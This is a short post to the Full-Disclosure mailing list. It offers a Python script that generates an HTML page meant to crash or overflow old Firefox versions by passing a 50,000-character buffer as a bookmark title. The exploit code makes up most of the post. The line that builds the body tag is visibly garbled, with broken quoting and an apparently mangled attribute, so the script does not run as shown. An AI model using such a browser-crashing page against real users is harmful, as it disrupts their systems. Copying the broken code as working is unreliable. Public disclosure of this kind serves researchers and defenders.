Hello Sumit,
I saw this for some time ago too and I far as I know the below code would do the same,
with the versions below 1.0.7. As I remember were all input fields "vulnerable". I have
choosen the bookmark "name" field, which will popup after loading with a long buffer.
html = open("firefox.html", "w")
buff = 'A' * 50000
html.write("<html><head>\n"
"<script type=\"text/_javascript_\">\n"
"function bookmarksite(title, url){\n"
"if (document.all)\n"
"window.external.AddFavorite(url, title);\n"
"else if (window.sidebar)\n"
"window.sidebar.addPanel(title, url, \"\")}\n"
"</script></head>\n"
"<body id="mb_2">e('"+buff+"', 'http://www.mozilla.org')\"
>\n"
"</body></html>")
html.close()
Regards,
Casiamo
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
